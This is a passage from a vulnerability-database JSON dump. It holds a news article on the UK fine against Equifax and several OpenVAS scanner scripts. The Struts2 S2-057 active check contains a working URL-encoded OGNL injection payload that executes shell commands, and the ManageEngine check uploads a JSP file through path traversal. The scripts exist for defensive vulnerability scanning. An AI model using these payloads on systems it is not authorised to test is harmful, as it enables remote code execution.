"https://thehackernews.com/2017/09/windows-monero-miners.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-05-09T12:40:51", "description": "[![consumer credit reporting Equifax data breach](https://thehackernews.com/images/-1V4miBZKvxA/W6OU7pQw5sI/AAAAAAAAyLM/GdXx9FNEs_UiDXCnBFucDDfdR_AGIzUkwCLcBGAs/s728-e100/equifax-data-breach.jpg)](<https://thehackernews.com/images/-1V4miBZKvxA/W6OU7pQw5sI/AAAAAAAAyLM/GdXx9FNEs_UiDXCnBFucDDfdR_AGIzUkwCLcBGAs/s728-e100/equifax-data-breach.jpg>)\n\nAtlanta-based consumer credit reporting agency Equifax has been issued a \u00a3500,000 fine by the UK's privacy watchdog for its last year's [massive data breach](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) that exposed personal and financial data of hundreds of millions of its customers. \n \nYes, \u00a3500,000\u2014that's the maximum fine allowed by the UK's Data Protection Act 1998, though the penalty is apparently a small figure for a $16 billion company. \n \nIn July this year, the UK's data protection watchdog issued the maximum allowed fine of [\u00a3500,000 on Facebook](<https://thehackernews.com/2018/07/facebook-cambridge-analytica.html>) over the [Cambridge Analytica scandal](<https://thehackernews.com/2018/03/facebook-cambridge-analytica.html>), saying the social media giant Facebook failed to prevent its citizens' data from falling into the wrong hands. \n \n\n\n## Flashback: The Equifax Data Breach 2017\n\n \nEquifax suffered a massive data breach last year between mid-May and the end of July, exposing highly [sensitive data of as many as 145 million people](<https://thehackernews.com/2017/10/equifax-credit-security-breach.html>) globally. \n \nThe stolen information included victims' names, dates of birth, phone numbers, driver's license details, addresses, and social security numbers, along with credit card information and personally identifying information (PII) for hundreds of thousands of its consumers. \n \nThe data breach occurred because the company failed to patch a [critical Apache Struts 2 vulnerability](<https://thehackernews.com/2017/09/equifax-apache-struts.html>) ([CVE-2017-5638](<https://thehackernews.com/2017/03/apache-struts-framework.html>)) on time, for which patches were already issued by the respected companies. \n \n\n\n## Why U.K. Has Fined a US Company?\n\n \nThe UK's Information Commissioner's Office (ICO), who launched a joint investigation into the breach with the Financial Conduct Authority, has now [issued](<https://ico.org.uk/about-the-ico/news-and-events/news-and-blogs/2018/09/credit-reference-agency-equifax-fined-for-security-breach/>) its largest possible monetary penalty under the country's Data Protection Act for the massive data breach\u2014\u00a3500,000, which equals to around $665,000. \n \nThe ICO said that although the [cyber attack compromised Equifax](<https://thehackernews.com/2017/09/equifax-data-breach.html>) systems in the United States, the company \"failed to take appropriate steps\" to protect the personal information of its 15 million UK customers. \n \nThe ICO investigation revealed \"multiple failures\" at the company like keeping users' personal information longer than necessary, which resulted in: \n\n\n * 19,993 UK customers had their names, dates of birth, telephone numbers and driving license numbers exposed.\n * 637,430 UK customers had their names, dates of birth and telephone numbers exposed.\n * Up to 15 million UK customers had names and dates of birth exposed.\n * Some 27,000 Britishers also had their Equifax account email addresses swiped.\n * 15,000 UK customers also had their names, dates of birth, addresses, account usernames and plaintext passwords, account recovery secret questions, and answers, obscured credit card numbers, and spending amounts stolen by hackers.\n \n\n\n## Breach Was Result of Multiple Failures at Equifax\n\n \nThe ICO said that Equifax had also been warned about a [critical Apache Struts 2 vulnerability](<https://thehackernews.com/2017/03/apache-struts-framework.html>) in its systems by the United States Department of Homeland Security (DHS) in March 2017, but the company did not take appropriate steps to fix the issue. \n \nInitially, it was also reported that the company kept news of the [breach hidden for a month](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) after its internal discovery, giving three senior executives at Equifax time to sell almost $2 million worth of its shares, though the company denied such claims. \n \nSince the data breach happened before the EU's General Data Protection Regulation (GDPR) took effect in May 2018, the maximum fine of \u00a3500,000 imposed under the UK's old Data Protection Act 1998 is still lesser. \n \nThe penalty could have been much larger had it fallen under GDPR, wherein a company could face a [maximum fine of 20 million euros](<https://thehackernews.com/2017/08/data-breach-security-law.html>) or 4 percent of its annual global revenue, whichever is higher, for such a privacy breach. \n \nIn response to the ICO's penalty, Equifax said that the company has fully cooperated with the ICO throughout the investigation that it is \"disappointed in the findings and the penalty.\" \n \nEquifax received the Monetary Penalty Notice from the ICO on Wednesday and can appeal the penalty.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-09-20T13:54:00", "type": "thn", "title": "UK Regulator Fines Equifax \u00a3500,000 Over 2017 Data Breach", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-09-20T13:54:52", "id": "THN:AF93AEDBDE6169AD1163D53979A4EA04", "href": "https://thehackernews.com/2018/09/equifax-credit-reporting-breach.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-05-08T10:31:11", "description": "This host is running Apache Struts and is prone to a remote code execution\nvulnerability.", "cvss3": {}, "published": "2018-08-27T00:00:00", "type": "openvas", "title": "Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2020-05-05T00:00:00", "id": "OPENVAS:1361412562310141398", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141398", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141398\");\n script_version(\"2020-05-05T10:19:36+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-05 10:19:36 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-08-27 13:07:39 +0700 (Mon, 27 Aug 2018)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"www/action_jsp_do\");\n\n script_tag(name:\"vuldetect\", value:\"Try to execute a command by sending a special crafted HTTP GET request.\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is prone to a remote code execution\nvulnerability.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to errors in conditions when namespace value isn't set for\na result defined in underlying configurations and in same time, its upper action(s) configurations have no or\nwildcard namespace. Same possibility when using url tag which doesn't have value and action set and in same time,\nits upper action(s) configurations have no or wildcard namespace.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts versions 2.3 through 2.3.34 and 2.5 through 2.5.16\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.35 or 2.5.17 or later.\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_xref(name:\"URL\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_xref(name:\"URL\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nport = http_get_port(default: 80);\nhost = http_host_name(dont_add_port: TRUE);\n\nurls = make_list();\n\nexts = http_get_kb_file_extensions(port: port, host: host, ext: \"action\");\nif (exts && is_array(exts))\n urls = make_list(urls, exts);\n\ncmds = exploit_commands();\n\nforeach url (urls) {\n path = eregmatch(pattern: \"(.*/)([^.]+\\.action)\", string: url);\n if (isnull(path[2]))\n continue;\n\n action = path[2];\n dir = path[1];\n\n foreach cmd (keys(cmds)) {\n url_check = dir + \"%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.\" +\n \"%28%23cmd%3D%27\" + cmds[cmd] + \"%27%29.%28%23iswin%3D%28%40\" +\n \"java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27\" +\n \"win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B\" +\n \"%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder\" +\n \"%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start\" +\n \"%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse\" +\n \"%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy\" +\n \"%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/\" + action;\n\n if (http_vuln_check(port: port, url: url_check, pattern: cmd, check_header: TRUE)) {\n report = http_report_vuln_url(port: port, url: url_check);\n security_message(port: port, data: report);\n exit(0);\n }\n }\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-16T16:50:59", "description": "ManageEngine Desktop Central 9 suffers from a vulnerability that\n allows a remote attacker to upload a malicious file, and execute it under the context of SYSTEM.", "cvss3": {}, "published": "2016-11-01T00:00:00", "type": "openvas", "title": "ManageEngine Desktop Central 9 FileUploadServlet connectionId Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8249"], "modified": "2020-04-15T00:00:00", "id": "OPENVAS:1361412562310140041", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140041", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# ManageEngine Desktop Central 9 FileUploadServlet connectionId Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:zohocorp:manageengine_desktop_central\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140041\");\n script_cve_id(\"CVE-2015-8249\");\n script_version(\"2020-04-15T09:02:26+0000\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-04-15 09:02:26 +0000 (Wed, 15 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-11-01 16:26:16 +0100 (Tue, 01 Nov 2016)\");\n script_name(\"ManageEngine Desktop Central 9 FileUploadServlet connectionId Vulnerability\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_manage_engine_desktop_central_detect.nasl\");\n script_mandatory_keys(\"ManageEngine/Desktop_Central/installed\");\n script_require_ports(\"Services/www\", 8020);\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker to gain arbitrary code\n execution on the server.\");\n\n script_tag(name:\"affected\", value:\"ManageEngine Desktop Central 9 < build 90142.\");\n\n script_tag(name:\"solution\", value:\"Update to ManageEngine Desktop Central 9, build 90142 or newer.\");\n script_tag(name:\"vuldetect\", value:\"Try to upload a jsp file.\");\n\n script_tag(name:\"summary\", value:\"ManageEngine Desktop Central 9 suffers from a vulnerability that\n allows a remote attacker to upload a malicious file, and execute it under the context of SYSTEM.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit( 0 );\n\nif( ! dir = get_app_location( cpe:CPE, port:port ) )\n exit( 0 );\n\nif( dir == \"/\" ) dir = \"\";\n\nhost = http_host_name( port:port );\n\nvtstrings = get_vt_strings();\nvt_string = vtstrings[\"default\"];\nstr = vt_string + '_CVE-2015-8249_' + rand();\n\npostdata = '<%= new String(\"' + str + '\") %>';\n\nfile = vt_string + '_CVE-2015-8249_test.jsp';\n\nurl = dir + '/fileupload?connectionId=AAAAAAA%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cjspf%5c' + file + '%00&resourceId=B&action=rds_file_upload&computerName=' + vt_string + '%2ephp&customerId=47474747';\n\nreq = http_post_put_req( port:port, url:url, data:postdata,\n add_headers:make_array( \"Content-Type\", \"application/octet-stream\") );\nbuf = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\nif( !buf || buf !~ \"^HTTP/1\\.[01] 200\" )\n exit( 99 );\n\nurl = dir + '/jspf/' + file;\nreq = http_get( item:url, port:port );\nbuf = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\nif( str >< buf ) {\n report = 'It was possible to upload the file `' + http_report_vuln_url( url:url, port:port, url_only:TRUE ) + '`. Please delete this file.\\n\\n';\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:50:22", "description": "The remote host is missing updates announced in\nadvisory GLSA 200608-11.", "cvss3": {}, "published": "2008-09-24T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200608-11 (webmin/usermin)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3392"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:57861", "href": "http://plugins.openvas.org/nasl.php?oid=57861", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Webmin and Usermin are vulnerable to an arbitrary file disclosure through a\nspecially crafted URL.\";\ntag_solution = \"All Webmin users should update to the latest stable version:\n\n # emerge --sync\n # emerge --ask --verbose --oneshot '>=app-admin/webmin-1.290'\n\nAll Usermin users should update to the latest stable version:\n\n # emerge --sync\n # emerge --ask --verbose --oneshot '>=app-admin/usermin-1.220'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200608-11\nhttp://bugs.gentoo.org/show_bug.cgi?id=138552\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200608-11.\";\n\n \n\nif(description)\n{\n script_id(57861);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2006-3392\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Gentoo Security Advisory GLSA 200608-11 (webmin/usermin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"app-admin/webmin\", unaffected: make_list(\"ge 1.290\"), vulnerable: make_list(\"lt 1.290\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"app-admin/usermin\", unaffected: make_list(\"ge 1.220\"), vulnerable: make_list(\"lt 1.220\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-02T21:10:24", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "cvss3": {}, "published": "2008-09-04T00:00:00", "type": "openvas", "title": "FreeBSD Ports: webmin", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3392"], "modified": "2016-10-04T00:00:00", "id": "OPENVAS:57067", "href": "http://plugins.openvas.org/nasl.php?oid=57067", "sourceData": "#\n#VID 227475c2-09cb-11db-9156-000e0c2e438a\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n webmin\n usermin\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.webmin.com/security.html\nhttp://www.vuxml.org/freebsd/227475c2-09cb-11db-9156-000e0c2e438a.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(57067);\n script_version(\"$Revision: 4203 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-10-04 07:30:30 +0200 (Tue, 04 Oct 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2006-3392\");\n script_bugtraq_id(18744);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"FreeBSD Ports: webmin\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"webmin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.290\")<0) {\n txt += 'Package webmin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"usermin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.220\")<0) {\n txt += 'Package usermin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2020-06-09T17:44:50", "description": "It is possible to perform a RCE attack when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then namespace value isn", "cvss3": {}, "published": "2020-06-05T00:00:00", "type": "openvas", "title": "Huawei Data Communication: Apache Struts2 S2-057 Remote Code Execution Vulnerability in Some Huawei Products (huawei-sa-20181121-01-struts2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2020-06-06T00:00:00", "id": "OPENVAS:1361412562310108792", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108792", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108792\");\n script_version(\"2020-06-06T12:09:29+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-06 12:09:29 +0000 (Sat, 06 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-05 08:17:40 +0000 (Fri, 05 Jun 2020)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2018-11776\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Huawei Data Communication: Apache Struts2 S2-057 Remote Code Execution Vulnerability in Some Huawei Products (huawei-sa-20181121-01-struts2)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei\");\n script_dependencies(\"gb_huawei_vrp_network_device_consolidation.nasl\");\n script_mandatory_keys(\"huawei/vrp/detected\");\n\n script_tag(name:\"summary\", value:\"It is possible to perform a RCE attack when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then namespace value isn't set for a result defined in underlying configurations and in same time, its upper package configuration have no or wildcard namespace and same possibility when using url tag which doesn't have value and action set and in same time, its upper package configuration have no or wildcard namespace.\");\n\n script_tag(name:\"insight\", value:\"It is possible to perform a RCE attack when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then namespace value isn't set for a result defined in underlying configurations and in same time, its upper package configuration have no or wildcard namespace and same possibility when using url tag which doesn't have value and action set and in same time, its upper package configuration have no or wildcard namespace. (Vulnerability ID: HWPSIRT-2018-08200)This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2018-11776.Huawei has released software updates to fix this vulnerability. This advisory is available in the linked references.\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit this vulnerability to perform a remote code execution attack\");\n\n script_tag(name:\"affected\", value:\"Seco VSM versions V200R002C00\n\neLog versions V200R005C00 V200R006C10 V200R007C00SPC100\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", value:\"https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20181121-01-struts2-en\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n# nb: Unknown device (no VRP), no public vendor advisory or general inconsistent / broken data\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:47:51", "description": "This host is missing a critical security\n update according to Microsoft KB3197835.", "cvss3": {}, "published": "2017-06-16T00:00:00", "type": "openvas", "title": "Microsoft Windows 'WebDAV' Remote Code Execution Vulnerability (KB3197835)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7269"], "modified": "2019-12-20T00:00:00", "id": "OPENVAS:1361412562310811206", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811206", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows 'WebDAV' Remote Code Execution Vulnerability (KB3197835)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811206\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2017-7269\");\n script_bugtraq_id(97127);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-06-16 12:56:08 +0530 (Fri, 16 Jun 2017)\");\n script_name(\"Microsoft Windows 'WebDAV' Remote Code Execution Vulnerability (KB3197835)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\", \"gb_wmi_access.nasl\");\n script_mandatory_keys(\"WMI/access_successful\", \"SMB/WindowsVersion\");\n script_exclude_keys(\"win/lsc/disable_wmi_search\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/3197835\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to 